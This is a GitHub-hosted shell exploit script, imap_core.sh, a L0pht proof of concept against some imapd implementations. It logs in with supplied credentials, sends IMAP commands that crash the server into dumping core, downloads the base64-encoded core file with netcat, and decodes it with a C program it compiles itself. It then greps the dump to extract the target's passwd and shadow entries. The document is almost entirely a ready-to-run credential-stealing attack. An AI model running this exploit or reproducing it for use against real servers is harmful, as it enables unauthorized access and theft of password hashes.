forked from ProjectZeroDays/Exploits2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathimap_core.sh
executable file
·287 lines (237 loc) · 6.2 KB
/
imap_core.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
#!/bin/sh
#
# A quick little tool that shows the dangers of priveledged programs dumping
# core.
#
# Shout outs to a bunch of people - in particular Nettwerk.
# Hey Nettwerk where'd ya go?
# Programs
NC=/usr/local/bin/nc
CAT=/bin/cat
RM=/bin/rm
GREP=/bin/grep
TAIL=/bin/tail
HEAD=/bin/head
MV=/bin/mv
TR=/bin/tr
STRINGS=/bin/strings
FILE=/bin/file
CC=/usr/local/bin/gcc
# temporary command and storage files
CMDS1=nc_commands1
CMDS2=nc_commands2
DECODE64_SRC=b64.c
TMPNAM=vunlklyname
TMPFILE=tmp.$$
# compiled BASE64 decoding program
DECODE64=./b64
# core file - sometimes base64 sometimes actuall dump file
CORE=core.$$
if [ $# != 3 ] ; then
echo "usage: `basename $0` target username password"
exit
fi
echo
echo "[L0pht Heavy Industries - l0pht.com]"
echo "`basename $0` - "
echo " this is a quick proof of concept tool that causes some imapd"
echo " implementations to dump core. Unfortunately the core file "
echo " contains the password and shadow password file in it!"
echo " .mudge [[email protected]]"
echo
# command line supplied variables
TARGET=$1
USER=$2
PASS=$3
# resultant password and shadow files
PASSWD=./etc_passwd_$TARGET
SHADOW=./etc_shadow_$TARGET
# the following logs in in plaintext as opposed through X AUTHENTICATE -
# you have been forwarned...
# login with $user $pass
# create a folder that probably isn't there
# select the folder
# copy the file to another name
# the above will cause IMAP4rev1 to crash via calling dummy_copy
# note: there are many other ways to get this thing to crash.
cat > $CMDS1 << FOEFOE
1 LOGIN $USER $PASS
2 CREATE $TMPNAM
3 SELECT $TMPNAM
4 COPY $TMPNAM $TMPNAM.$$
FOEFOE
# login with $user $pass (again in plaintext...)
# select the core file
# retrieve the core file base64 encoded as per RFC822
# delete the core file
# delete the temporary file we created
# bye bye
cat > $CMDS2 << FOEFOE
1 LOGIN $USER $PASS
2 SELECT core
3 UID FETCH 1 (UID RFC822.SIZE RFC822)
4 DELETE core
5 DELETE $TMPNAM
4 LOGOUT
FOEFOE
# The following quick little program to decode base64 was yanked in
# big chunks from Dave Winer's code sitting on
# http://www.scripting.com/midas/base64/source.html
# hey, credit where it's due - Dave saved me some time here.
# modest changes by: [email protected]
cat > $DECODE64_SRC << FOEFOE
#include <stdio.h>
#define TRUE 1
#define FALSE 0
void decodefile(FILE *, FILE *);
int main(int argc, char *argv[]){
FILE *fin, *fout;
if (argc > 3){
printf("Usage: %s <infile> <outfile>\n", argv[0]);
exit(1);
}
switch(argc){
case 3:
fin = fopen(argv[1], "r");
fout = fopen(argv[2], "w");
if (!fin || !fout) {
perror("fopen");
exit(1);
}
break;
case 2:
fin = fopen(argv[1], "r");
fout = stdout;
if (!fin) {
perror("fopen");
exit(1);
}
break;
case 1:
fin = stdin;
fout = stdout;
break;
}
decodefile(fin, fout);
close(fin);
close(fout);
exit(0);
}
void decodefile(FILE *fin, FILE *fout) {
short charctr;
int breakout;
unsigned char ch;
unsigned char inbuf[3], outbuf[4];
short bufctr = 0, ignore, eot = 0;
while ((ch = fgetc(fin))) {
if (feof(fin)){
close(fin);
break;
}
ignore = FALSE;
if ((ch >= 'A') && (ch <= 'Z'))
ch = ch - 'A';
else if ((ch >= 'a') && (ch <= 'z'))
ch = ch - 'a' + 26;
else if ((ch >= '0') && (ch <= '9'))
ch = ch - '0' + 52;
else if (ch == '+')
ch = 62;
else if (ch == '=')
eot = TRUE;
else if (ch == '/')
ch = 63;
else
ignore = TRUE;
if (!ignore) {
charctr = 3;
breakout = FALSE;
if (eot) {
if (bufctr == 0)
break;
if ((bufctr == 1) || (bufctr == 2))
charctr = 1;
else
charctr = 2;
bufctr = 3;
breakout = TRUE;
}
inbuf[bufctr++] = ch;
if (bufctr == 4) {
bufctr = 0;
outbuf[0] = (inbuf[0] << 2) | ((inbuf[1] & 0x30) >> 4);
outbuf[1] = ((inbuf[1] & 0x0F) << 4) | ((inbuf[2] & 0x3C) >> 2);
outbuf[2] = ((inbuf[2] & 0x03) << 6) | (inbuf[3] & 0x3F);
fprintf(fout, "%c%c%c", outbuf[0], outbuf[1], outbuf[2]);
}
if (breakout)
break;
}
}
}
FOEFOE
$CC -o $DECODE64 $DECODE64_SRC
if [ ! -x $DECODE64 ] ; then
echo "failed to compile base 64 decoding utility"
echo "stop"
$RM -f $DECODE64_SRC $DECODE64
exit
fi
echo "[Starting]"
echo "Built base64 decoder..."
echo
echo "Running imap attack..."
$CAT $CMDS1 | $NC -w 10 $TARGET 143 > $TMPFILE
grep -i "server crashing" $TMPFILE > /dev/null
if [ $? -eq 0 ] ; then
echo
echo "Forced server to dump core. Reconnecting to grab file and clean up!"
$CAT $CMDS2 | $NC -w 10 $TARGET 143 > $CORE
$RM -f $CMDS1 $CMDS2 $TMPFILE
echo "Stripping trailing c/r from RFC822 base64 encapsulated core file"
# interesting... I must've missed the section of rfc 1521 that stated
# they'd make this DOS'ish
$TR -d '\015' < $CORE > $CORE.2 # strip off ^M's from file
$MV -f $CORE.2 $CORE
else
echo "Failed to crash server... cleaning up"
$RM -f $CMDS1 $CMDS2 $TMPFILE $DECODE64 $DECODE64_SRC
exit
fi
echo "Removing imap crap from beginning and end of $CORE"
VAR=`grep -n "^$" $CORE | awk -F: '{print $1}'`
VAR=`expr $VAR + 1`
$TAIL +$VAR $CORE > $TMPFILE
VAR=`grep -n "=" $TMPFILE | awk -F: '{print $1}'`
$HEAD -$VAR $TMPFILE > $CORE
$RM $TMPFILE
echo
echo "Converting base64 image to binary core file..."
$DECODE64 $CORE $TMPFILE
$MV $TMPFILE $CORE
$FILE $CORE
$STRINGS - $CORE | $GREP ':x:' > $PASSWD
$STRINGS -n 13 - $CORE | $GREP ':' | $GREP -v ' ' | $GREP -v ':x:' > $SHADOW
if [ -s $PASSWD ] ; then
echo
echo "Successfully grabbed some form of password file for $TARGET"
echo " results located in $PASSWD"
else
echo "failed to create $PASSWD"
$RM -f $PASSWD
fi
if [ -s $SHADOW ] ; then
echo "Successfully grabbed some form of shadow file for $TARGET"
echo " results located in $SHADOW"
echo " [note: some manual cleanup of $SHADOW is probably required]"
echo
else
echo "failed to create $SHADOW"
echo
$RM -f $SHADOW
fi
$RM -f $DECODE64 $DECODE64_SRC
$MV -f $CORE core_${TARGET}
echo "[Finished]"
# www.hack.co.za #